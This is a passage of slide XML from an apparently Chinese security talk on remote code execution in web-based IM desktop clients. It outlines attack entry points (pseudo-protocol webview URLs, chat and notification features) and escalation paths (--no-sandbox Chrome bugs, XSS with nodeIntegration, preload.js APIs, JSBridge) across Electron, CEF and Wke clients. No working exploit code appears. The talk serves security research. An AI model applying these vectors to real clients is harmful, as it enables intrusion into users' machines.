              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-41075" y="462196"/>
              <a:ext cx="344922" cy="159150"/>
            </a:xfrm>
            <a:prstGeom prst="triangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B0F0">
                <a:alpha val="872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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="组合 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B3FFF9-9DDB-F99D-8EBD-1894704B6C1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="352071" y="1643720"/>
            <a:ext cx="11487858" cy="4278094"/>
            <a:chOff x="352071" y="2023548"/>
            <a:chExt cx="11487858" cy="4278094"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="文本框 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DA1A3C2-BDC9-F4A3-21CA-4AFF4BB9F9AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="352071" y="2023548"/>
              <a:ext cx="6602695" cy="4278094"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>攻击入口：</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1"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1.</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> 伪协议</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> -&gt; </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Xxx</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>webview</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>url</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>=http://</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>xxxx</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2.</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> 功能点</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> -&gt; IM</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>（即时通讯）自带的各种功能（聊天、备注、通知）</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a:t>
              </a:r>
            </a:p>
            <a:p>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b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>RCE</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>风险：</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1"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1.</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Chrome</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>历史</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>RCE</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a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>--no-sandbox</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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2.</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> 原生</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Nodejs</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>语法执行（</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>XSS/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ViewWeb</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>-&gt; RCE</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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>nodeIntegration</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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3.</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>preload.js</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>自定义</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>组合</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>RCE</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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4. </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>JSBridge</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>语法执行（</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>XSS /</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ViewWeb</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>-&gt; RCE</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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a:t>
              </a:r>
            </a:p>
            <a:p>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zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>影响面（举例说明）：</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="342900" indent="-342900">
                <a:buAutoNum type="arabicPeriod"/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>CEF</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a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Chromium Embedded Framework</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>）类客户端：</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Electron</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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自定义前端渲染引擎客户端：</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Wke</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="图片 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056B234E-9F63-A21F-3CA4-9016B559A52C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7029583" y="2545213"/>
              <a:ext cx="4810346" cy="3479070"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="650687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
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B806ACC9-91BD-BDA2-9BB0-44A272027F16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3077882" y="3198168"/>
            <a:ext cx="6036236" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>类客户端问题：某</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>IM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>客户端应用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"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758922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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>IM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>客户端应用</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合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E70AEE1B-789A-0187-4A00-523AE7E2730D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="245686" y="1792850"/>
            <a:ext cx="11929228" cy="4238956"/>
            <a:chOff x="131386" y="1851109"/>
            <a:chExt cx="11929228" cy="4238956"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C16DB580-CAD4-8117-44C3-C703C7998E92}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect l="21155"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="306085" y="2998359"/>
              <a:ext cx="4049332" cy="2649796"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
